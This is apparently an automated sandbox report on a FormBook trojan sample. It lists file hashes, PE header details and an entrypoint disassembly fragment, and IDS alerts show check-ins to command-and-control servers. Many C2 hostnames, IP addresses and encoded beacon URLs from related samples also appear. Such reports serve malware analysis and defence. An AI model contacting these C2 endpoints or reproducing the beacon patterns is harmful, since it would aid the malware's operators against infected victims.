198.185.159.144	ext-sq.squarespace.com	United States	53831	SQUARESPACEUS	false
217.160.0.254	www.surivaganza.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
50.87.238.189	tinsley.website	United States	46606	UNIFIEDLAYER-AS-1US	true
52.5.43.61	cajunseafoodstcloud.com	United States	14618	AMAZON-AESUS	true
64.227.87.162	melodezu.com	United States	14061	DIGITALOCEAN-ASNUS	true
34.102.136.180	extinctionbrews.com	United States	15169	GOOGLEUS	false
50.87.248.20	matcitekids.com	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	452405
Start date:	22.07.2021
Start time:	10:07:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	wREFu91LXZ.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/0@12/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 15.9% (good quality ratio 13%) Quality average: 67.2% Quality standard deviation: 36.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 72 Number of non-executed functions: 31
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 23.211.5.146, 52.147.198.201, 23.211.6.115, 104.43.193.48, 23.211.4.86, 20.82.210.154, 173.222.108.210, 173.222.108.226, 51.103.5.159, 80.67.82.211, 80.67.82.235, 40.112.88.60, 20.50.102.62 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.185.159.144	Orden de compra cotizacion.exe	Get hash	malicious	Browse	www.hatchethangout.com/vd9n/?b2Jda=DQ3LVDWlWtcUIlt1+CwvlUtDR5SkXT0PHl+npd08a6K4tUsO2N8Mk9PUhZ8nXrZ6VOqVJWfEOA==&pJB0=06ut_FPhn
	Inv_7623980.exe	Get hash	malicious	Browse	www.staydoubted.com/m6b5/?s6A=pktzo183IxXcoqS041D7E1eIfcf1CshexlvI7R5YZ4XrClTYSIFYZO6NkU07LKi7alFGzeeDww==&u4kxI=5j-Ly2Z8tz0Hwrs
	Ever Brilliant scan.xlsx	Get hash	malicious	Browse	www.groovysmoothieandjuice.com/qmf6/?4htd=UfHwMWmYBRwkI7Z+labDTmt8TnN7bBW1jO7Sb5ZOxpTJTW7jvDNawGyR05uMew8y+TGLIw==&fDHX=mjDdu2iXaB
	SMdWrQW0nH.exe	Get hash	malicious	Browse	www.chaneabond.com/dy8g/?7nttTz=XZ7DUzy0phYTzxkp&lVo=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6RNbTLcPGL0p8EycZw==
	TT COPY $45000 15.07.2021.exe	Get hash	malicious	Browse	www.miraclepawsfoundation.com/p6ai/?h2JTJt=+PzjM1NhMYGi2Wb9Hn0d3fC9h9foQ2RCKNNOQrdlkE8gE6LYJeni4s5y8VCIeiPMbHFH&XJBl=5jnLgdipVfk
	PO_8356.pdf.exe	Get hash	malicious	Browse	www.the427group.com/ogpo/?7n0lq=wV1bXSp1XHJfT8T6S98AytRIJMK/GRP4l/ZsjCYErbEGvOk0H3UCALrW+92LSFz5kfRapGtPbQ==&hnQLA0=d2MtV2hhcv98DBGP
	Payment_Ref_Advice.xlsx	Get hash	malicious	Browse	www.chaneabond.com/dy8g/?Otx=hZrp3dQ0n&Sb=0Hs+m/QAKNZgFgMOhLHyI7vfWqidr4y2jXJwlE7hYZJX+dIO06LLnmU853NdLqEHK9AIlw==
	PDF.Requisition itemspo1123pdf.exe	Get hash	malicious	Browse	www.alanalevittstudio.com/gscc/?Hh=GfKPFvb&k8=jSc6B1w1nKS0Uxq6RD1v6hlgeE273fusI6vNI10ZzAxHnndtYQ10NWAsY6v2B0Iz3FRA
	Purchase Order 127008454.exe	Get hash	malicious	Browse	www.utrexpress.com/gscc/?_VR4=GISq5y5xA/qCQ15p4sd9yDbKxueN42KBsaZoHVqTzVOlLBMjyFN5SWfHzvrUrljRpGgL&jPh=OFQptzFhkd
	Invoice number FV0062022028.exe	Get hash	malicious	Browse	www.howdoivote.info/gg9g/?MN64X=vND08cHGVezTHjK75sdEZ/nmneYmPu0DqyzR++CGQ9wPNUFXpPsK86C/91Xgg79sNWP4&oTz=0Prl2jAp9lDpep
	Rq0Y7HegCd.exe	Get hash	malicious	Browse	www.chaneabond.com/dy8g/?3f=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&XRtpal=y48HaFr
	PO#JFUB0002 FOR NEW ORDER.exe	Get hash	malicious	Browse	www.uluapokehouse.com/u9pi/?z658CR=aeDN/YE3ORvAzR+GWrC2+TG63pFDugwwZ19jzG1fqsa4jOVSOgKexm4OoFmfHCPkdLO8kdDrWA==&Axlx=MR-D
	vbc.exe	Get hash	malicious	Browse	www.laurenkilbane.com/usur/?UT=9mhm3kIAbFxl5NCfFppBjkM9d4SkiQx3jmSdu6GJUXfc0y1jZvPXleFurq0+EV1bw9KY&g0D0=2dx06l
	P0. 556117090.doc	Get hash	malicious	Browse	www.loty-hd.com/k1rc/?N2=r5W8qzN/qHFyOC3qbzi78+WXKVvXpraIJpFafVS+Smj0a5cu+CPt7aYcqkSgYUn3ghlnOA==&Nxl0A8=5jiLRl9pajXpc
	rOFZ7NRC7X.exe	Get hash	malicious	Browse	www.terresdegaillac.com/rerx/?DvFXm=BoaFdp1T45ERkcs2LBIklavYyTLapdQPas2cqy1Xn5do2FthUKlw1za9mZvYOp4oyClNK04Thw==&lFQ=VN9htxGxx
	Quotation.exe	Get hash	malicious	Browse	www.maridaniellecontreras.com/pz9b/?x4ULcXK=W4bdvO/89GYClAMU3ffqMErimtJOpUtEbIU7G4Yx1MYUNHSd5OQFWuVJAd4dpRbzSoX2&oXnDM=9rjL3By8U2
	Lista degli ordini.exe	Get hash	malicious	Browse	www.theapiarystudios.com/3nop/?j6A=3frxU&GpTt=a0+gJPJox0wy2xl4ssIh5hYkacq9v+aL+esRqxMWwM8ucEZww42nY3BfWMQBFmq4gqPU
	bkeu3n7Rh4.exe	Get hash	malicious	Browse	www.antiqueson3rd.com/nins/?EL3LVD=hj0t+7N4NJpI43tT3BNIMCOgqjuhuFQ3ZftHsG9c1w81A2v6n8VyCeaNUYnDgkw5P1CA&r0DpbP=J8Zh4FP8nbAhHn
	Order.exe	Get hash	malicious	Browse	www.maridaniellecontreras.com/pz9b/?1bmDH2y0=W4bdvO/89GYClAMU3ffqMErimtJOpUtEbIU7G4Yx1MYUNHSd5OQFWuVJAeUe1hXLfJqgdERflA==&I6Aldd=sZSH
	SOA May-June 2021.exe	Get hash	malicious	Browse	www.boundlessoutdoorfitness.com/u8u4/?q48l=LJHr9IuKUB347jpfux0mvhweAJQOFcdn1KvNUBljmEVHl7XNdz1SBPNDJb+TGHJK0VAw&hBZ=-ZcTFHRHlRdPjZE

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.surivaganza.com	Rq0Y7HegCd.exe	Get hash	malicious	Browse	217.160.0.254
ext-sq.squarespace.com	Inv_7623980.exe	Get hash	malicious	Browse	198.185.159.144
	Ever Brilliant scan.xlsx	Get hash	malicious	Browse	198.185.159.144
	SMdWrQW0nH.exe	Get hash	malicious	Browse	198.185.159.144
	TT COPY $45000 15.07.2021.exe	Get hash	malicious	Browse	198.185.159.144
	PO_8356.pdf.exe	Get hash	malicious	Browse	198.185.159.144
	Payment_Ref_Advice.xlsx	Get hash	malicious	Browse	198.185.159.144
	PDF.Requisition itemspo1123pdf.exe	Get hash	malicious	Browse	198.185.159.144
	Purchase Order 127008454.exe	Get hash	malicious	Browse	198.185.159.144
	PO_0187.eml.exe	Get hash	malicious	Browse	198.185.159.144
	Rq0Y7HegCd.exe	Get hash	malicious	Browse	198.185.159.144
	PO#JFUB0002 FOR NEW ORDER.exe	Get hash	malicious	Browse	198.185.159.144
	e8WQrpQ6Wg.exe	Get hash	malicious	Browse	198.185.159.144
	vbc.exe	Get hash	malicious	Browse	198.185.159.144
	P0. 556117090.doc	Get hash	malicious	Browse	198.185.159.144
	rOFZ7NRC7X.exe	Get hash	malicious	Browse	198.185.159.144
	Quotation.exe	Get hash	malicious	Browse	198.185.159.144
	bkeu3n7Rh4.exe	Get hash	malicious	Browse	198.185.159.144
	Order.exe	Get hash	malicious	Browse	198.185.159.144
	SOA May-June 2021.exe	Get hash	malicious	Browse	198.185.159.144
	ZSu9Xi5VWW.exe	Get hash	malicious	Browse	198.185.159.144

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ONEANDONE-ASBrauerstrasse48DE	tPzL0MlKIo	Get hash	malicious	Browse	82.165.135.254
	XfKsLIPLUu	Get hash	malicious	Browse	195.20.246.158
	Reciept 2868661.xlsb	Get hash	malicious	Browse	87.106.97.83
	order no. YOIMM20190832 pdf.exe	Get hash	malicious	Browse	217.160.0.62
	PTELOONB39-67.exe	Get hash	malicious	Browse	213.171.195.105
	mormanti.exe	Get hash	malicious	Browse	217.160.182.191
	deepRats.exe	Get hash	malicious	Browse	104.192.5.248
	fb6YVPzIC1.exe	Get hash	malicious	Browse	74.208.236.154
	JUSTlfl.exe	Get hash	malicious	Browse	213.165.67.102
	jnl3kWNWWS.exe	Get hash	malicious	Browse	213.171.195.105
	3gbRJCGEoa.exe	Get hash	malicious	Browse	82.223.190.139
	TnTnhIrSdN.exe	Get hash	malicious	Browse	216.250.121.85
	TeMdJqNMM0.exe	Get hash	malicious	Browse	217.160.0.194
	SecurityTrend.exe	Get hash	malicious	Browse	212.227.94.31
	UpdateToolKas.exe	Get hash	malicious	Browse	212.227.94.31
	FixTool2.exe	Get hash	malicious	Browse	212.227.94.31
	KASfixtool.exe	Get hash	malicious	Browse	212.227.94.31
	UpdateKAS.exe	Get hash	malicious	Browse	212.227.94.31
	DetectionTool.exe	Get hash	malicious	Browse	212.227.94.31
	C0TEsC936Q.exe	Get hash	malicious	Browse	217.160.0.101
SQUARESPACEUS	Orden de compra cotizacion.exe	Get hash	malicious	Browse	198.185.159.144
	Inv_7623980.exe	Get hash	malicious	Browse	198.185.159.144
	Ever Brilliant scan.xlsx	Get hash	malicious	Browse	198.185.159.144
	SMdWrQW0nH.exe	Get hash	malicious	Browse	198.185.159.144
	TT COPY $45000 15.07.2021.exe	Get hash	malicious	Browse	198.185.159.144
	PO_8356.pdf.exe	Get hash	malicious	Browse	198.185.159.144
	Payment_Ref_Advice.xlsx	Get hash	malicious	Browse	198.185.159.144
	PDF.Requisition itemspo1123pdf.exe	Get hash	malicious	Browse	198.185.159.144
	Purchase Order 127008454.exe	Get hash	malicious	Browse	198.185.159.144
	Invoice number FV0062022028.exe	Get hash	malicious	Browse	198.185.159.144
	Rq0Y7HegCd.exe	Get hash	malicious	Browse	198.185.159.144
	PO#JFUB0002 FOR NEW ORDER.exe	Get hash	malicious	Browse	198.185.159.144
	vbc.exe	Get hash	malicious	Browse	198.185.159.144
	P0. 556117090.doc	Get hash	malicious	Browse	198.185.159.144
	rOFZ7NRC7X.exe	Get hash	malicious	Browse	198.185.159.144
	Quotation.exe	Get hash	malicious	Browse	198.185.159.144
	Lista degli ordini.exe	Get hash	malicious	Browse	198.185.159.144
	bkeu3n7Rh4.exe	Get hash	malicious	Browse	198.185.159.144
	xwKdahKPn8.exe	Get hash	malicious	Browse	198.185.159.144
	Order.exe	Get hash	malicious	Browse	198.185.159.144

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.971712518685545
TrID:	Win32 Executable (generic) a (10002005/4) 99.83% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wREFu91LXZ.exe
File size:	177125
MD5:	686dc98567009e47eac88e95804b9dde
SHA1:	5788c30289d12f69d5cf323049d8d3c3a3e73cda
SHA256:	11d84c7f9c579c2e58f4acc04d488d5f1c6cc0439609099eabec42444f5ef952
SHA512:	1450afd067710a6c2385858a2d4c7a0afeb02516885ec2515de696fc89c18f985097089af39708ba0e8088547f6fcc0a6285136a5175c169be764d9ec40924ce
SSDEEP:	3072:6C/f5NIRlNlcHX0QuidYsPBpdpqbIYW/4Steoi+i1NVKlqxuk7n44QCvx7Ics0cz:RqlNlcHXbUApdJ/4+iXN0lqxNj4xC7rc
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........WuI\|9&I\|9&I\|9&@..&B\|9&I\|8&T\|9&@..&H\|9&@..&H\|9&RichI\|9&........................PE..L....(.`...................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x401000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x60F8288C [Wed Jul 21 14:00:44 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	1eef928161ef7d2982c39057cbea43bf

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 00000298h
mov byte ptr [ebp-00000290h], FFFFFFE9h
mov byte ptr [ebp-0000028Fh], FFFFFF90h
mov byte ptr [ebp-0000028Eh], 00000000h
mov byte ptr [ebp-0000028Dh], 00000000h
mov byte ptr [ebp-0000028Ch], 00000000h
mov byte ptr [ebp-0000028Bh], 00000055h
mov byte ptr [ebp-0000028Ah], FFFFFF8Bh
mov byte ptr [ebp-00000289h], FFFFFFECh
mov byte ptr [ebp-00000288h], 00000056h
mov byte ptr [ebp-00000287h], FFFFFF8Bh
mov byte ptr [ebp-00000286h], 00000075h
mov byte ptr [ebp-00000285h], 00000008h
mov byte ptr [ebp-00000284h], FFFFFFBAh
mov byte ptr [ebp-00000283h], 0000000Ah
mov byte ptr [ebp-00000282h], 00000008h
mov byte ptr [ebp-00000281h], 00000000h
mov byte ptr [ebp-00000280h], 00000000h
mov byte ptr [ebp-0000027Fh], 00000057h
mov byte ptr [ebp-0000027Eh], FFFFFFEBh
mov byte ptr [ebp-0000027Dh], 0000000Eh
mov byte ptr [ebp-0000027Ch], FFFFFF8Bh
mov byte ptr [ebp-0000027Bh], FFFFFFCAh
mov byte ptr [ebp-0000027Ah], FFFFFFD1h
mov byte ptr [ebp-00000279h], FFFFFFE8h
mov byte ptr [ebp-00000278h], FFFFFFC1h
mov byte ptr [ebp-00000277h], FFFFFFE1h
mov byte ptr [ebp-00000276h], 00000007h
mov byte ptr [ebp+00000000h], 00000000h

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3088	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3000	0x88	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11ae	0x1200	False	0.505208333333	data	4.82202801512	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x37a	0x400	False	0.4921875	data	4.3639595674	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
GDI32.dll	GetLogColorSpaceA, SetPixel, GetCharWidthI, GetWindowOrgEx, CreateDIBSection, GetBitmapBits, CombineRgn, GdiResetDCEMF
dbghelp.dll	SymSetOptions
wsnmp32.dll
SETUPAPI.dll	ExtensionPropSheetPageProc, SetupDiSetDeviceInstallParamsA, SetupScanFileQueueW, SetupDiOpenClassRegKeyExW, SetupQueryInfVersionInformationW, SetupGetLineCountW, SetupDiGetWizardPage
COMDLG32.dll	GetSaveFileNameA, GetFileTitleA, ReplaceTextW, ReplaceTextA, PrintDlgW, FindTextW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/22/21-10:09:46.745988	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	52.5.43.61
07/22/21-10:09:46.745988	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	52.5.43.61
07/22/21-10:09:46.745988	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	52.5.43.61
07/22/21-10:09:52.028852	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49739	80	192.168.2.3	34.102.136.180
07/22/21-10:09:52.028852	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49739	80	192.168.2.3	34.102.136.180
07/22/21-10:09:52.028852	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49739	80	192.168.2.3	34.102.136.180
07/22/21-10:09:52.168380	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49739	34.102.136.180	192.168.2.3
07/22/21-10:09:57.556419	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.3	50.87.238.189
07/22/21-10:09:57.556419	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.3	50.87.238.189
07/22/21-10:09:57.556419	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.3	50.87.238.189
07/22/21-10:10:13.489747	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49743	80	192.168.2.3	50.87.248.20
07/22/21-10:10:13.489747	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49743	80	192.168.2.3	50.87.248.20
07/22/21-10:10:13.489747	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49743	80	192.168.2.3	50.87.248.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 10:09:30.576597929 CEST	49735	80	192.168.2.3	198.185.159.144
Jul 22, 2021 10:09:30.709585905 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.709726095 CEST	49735	80	192.168.2.3	198.185.159.144
Jul 22, 2021 10:09:30.709867954 CEST	49735	80	192.168.2.3	198.185.159.144
Jul 22, 2021 10:09:30.842448950 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850486994 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850527048 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850545883 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850559950 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850578070 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850606918 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850624084 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850641012 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850658894 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850675106 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.850789070 CEST	49735	80	192.168.2.3	198.185.159.144
Jul 22, 2021 10:09:30.850819111 CEST	49735	80	192.168.2.3	198.185.159.144
Jul 22, 2021 10:09:30.850832939 CEST	49735	80	192.168.2.3	198.185.159.144
Jul 22, 2021 10:09:30.983715057 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.983779907 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.983839989 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.983865023 CEST	49735	80	192.168.2.3	198.185.159.144
Jul 22, 2021 10:09:30.983931065 CEST	49735	80	192.168.2.3	198.185.159.144
Jul 22, 2021 10:09:30.983946085 CEST	80	49735	198.185.159.144	192.168.2.3
Jul 22, 2021 10:09:30.984003067 CEST	49735	80	192.168.2.3	198.185.159.144
Jul 22, 2021 10:09:41.096314907 CEST	49736	80	192.168.2.3	64.227.87.162
Jul 22, 2021 10:09:41.283951044 CEST	80	49736	64.227.87.162	192.168.2.3
Jul 22, 2021 10:09:41.284049034 CEST	49736	80	192.168.2.3	64.227.87.162
Jul 22, 2021 10:09:41.284584999 CEST	49736	80	192.168.2.3	64.227.87.162
Jul 22, 2021 10:09:41.472394943 CEST	80	49736	64.227.87.162	192.168.2.3
Jul 22, 2021 10:09:41.472515106 CEST	80	49736	64.227.87.162	192.168.2.3
Jul 22, 2021 10:09:41.472573042 CEST	80	49736	64.227.87.162	192.168.2.3
Jul 22, 2021 10:09:41.472721100 CEST	49736	80	192.168.2.3	64.227.87.162
Jul 22, 2021 10:09:41.472783089 CEST	49736	80	192.168.2.3	64.227.87.162
Jul 22, 2021 10:09:41.660042048 CEST	80	49736	64.227.87.162	192.168.2.3
Jul 22, 2021 10:09:46.582820892 CEST	49737	80	192.168.2.3	52.5.43.61
Jul 22, 2021 10:09:46.745685101 CEST	80	49737	52.5.43.61	192.168.2.3
Jul 22, 2021 10:09:46.745774031 CEST	49737	80	192.168.2.3	52.5.43.61
Jul 22, 2021 10:09:46.745987892 CEST	49737	80	192.168.2.3	52.5.43.61
Jul 22, 2021 10:09:46.909065962 CEST	80	49737	52.5.43.61	192.168.2.3
Jul 22, 2021 10:09:46.909236908 CEST	49737	80	192.168.2.3	52.5.43.61
Jul 22, 2021 10:09:46.909292936 CEST	49737	80	192.168.2.3	52.5.43.61
Jul 22, 2021 10:09:47.075243950 CEST	80	49737	52.5.43.61	192.168.2.3
Jul 22, 2021 10:09:51.986444950 CEST	49739	80	192.168.2.3	34.102.136.180
Jul 22, 2021 10:09:52.028575897 CEST	80	49739	34.102.136.180	192.168.2.3
Jul 22, 2021 10:09:52.028731108 CEST	49739	80	192.168.2.3	34.102.136.180
Jul 22, 2021 10:09:52.028851986 CEST	49739	80	192.168.2.3	34.102.136.180
Jul 22, 2021 10:09:52.070858002 CEST	80	49739	34.102.136.180	192.168.2.3
Jul 22, 2021 10:09:52.168380022 CEST	80	49739	34.102.136.180	192.168.2.3
Jul 22, 2021 10:09:52.168673992 CEST	49739	80	192.168.2.3	34.102.136.180
Jul 22, 2021 10:09:52.168807030 CEST	80	49739	34.102.136.180	192.168.2.3
Jul 22, 2021 10:09:52.168891907 CEST	49739	80	192.168.2.3	34.102.136.180
Jul 22, 2021 10:09:52.211878061 CEST	80	49739	34.102.136.180	192.168.2.3
Jul 22, 2021 10:09:57.375874996 CEST	49741	80	192.168.2.3	50.87.238.189
Jul 22, 2021 10:09:57.555730104 CEST	80	49741	50.87.238.189	192.168.2.3
Jul 22, 2021 10:09:57.555994987 CEST	49741	80	192.168.2.3	50.87.238.189
Jul 22, 2021 10:09:57.556418896 CEST	49741	80	192.168.2.3	50.87.238.189
Jul 22, 2021 10:09:57.735743999 CEST	80	49741	50.87.238.189	192.168.2.3
Jul 22, 2021 10:09:57.743305922 CEST	80	49741	50.87.238.189	192.168.2.3
Jul 22, 2021 10:09:57.743522882 CEST	49741	80	192.168.2.3	50.87.238.189
Jul 22, 2021 10:09:57.744333029 CEST	80	49741	50.87.238.189	192.168.2.3
Jul 22, 2021 10:09:57.744411945 CEST	49741	80	192.168.2.3	50.87.238.189
Jul 22, 2021 10:09:57.923999071 CEST	80	49741	50.87.238.189	192.168.2.3
Jul 22, 2021 10:10:02.840413094 CEST	49742	80	192.168.2.3	217.160.0.254
Jul 22, 2021 10:10:02.887598038 CEST	80	49742	217.160.0.254	192.168.2.3
Jul 22, 2021 10:10:02.887741089 CEST	49742	80	192.168.2.3	217.160.0.254
Jul 22, 2021 10:10:02.959182978 CEST	49742	80	192.168.2.3	217.160.0.254
Jul 22, 2021 10:10:03.006151915 CEST	80	49742	217.160.0.254	192.168.2.3
Jul 22, 2021 10:10:03.012269020 CEST	80	49742	217.160.0.254	192.168.2.3
Jul 22, 2021 10:10:03.012365103 CEST	80	49742	217.160.0.254	192.168.2.3
Jul 22, 2021 10:10:03.012581110 CEST	49742	80	192.168.2.3	217.160.0.254
Jul 22, 2021 10:10:03.102238894 CEST	49742	80	192.168.2.3	217.160.0.254
Jul 22, 2021 10:10:03.151477098 CEST	80	49742	217.160.0.254	192.168.2.3
Jul 22, 2021 10:10:13.309649944 CEST	49743	80	192.168.2.3	50.87.248.20
Jul 22, 2021 10:10:13.489243984 CEST	80	49743	50.87.248.20	192.168.2.3
Jul 22, 2021 10:10:13.489726067 CEST	49743	80	192.168.2.3	50.87.248.20
Jul 22, 2021 10:10:13.489747047 CEST	49743	80	192.168.2.3	50.87.248.20
Jul 22, 2021 10:10:13.672003984 CEST	80	49743	50.87.248.20	192.168.2.3
Jul 22, 2021 10:10:13.687524080 CEST	80	49743	50.87.248.20	192.168.2.3
Jul 22, 2021 10:10:13.687553883 CEST	80	49743	50.87.248.20	192.168.2.3
Jul 22, 2021 10:10:13.687732935 CEST	49743	80	192.168.2.3	50.87.248.20
Jul 22, 2021 10:10:13.688079119 CEST	49743	80	192.168.2.3	50.87.248.20
Jul 22, 2021 10:10:13.867357016 CEST	80	49743	50.87.248.20	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 10:08:11.309405088 CEST	50620	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:11.358716011 CEST	53	50620	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:12.009732962 CEST	64938	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:12.101109028 CEST	53	64938	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:12.238713980 CEST	60152	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:12.290486097 CEST	53	60152	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:14.522972107 CEST	57544	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:14.579864979 CEST	53	57544	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:27.852622032 CEST	55984	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:27.905174017 CEST	53	55984	8.8.8.8	192.168.2.3
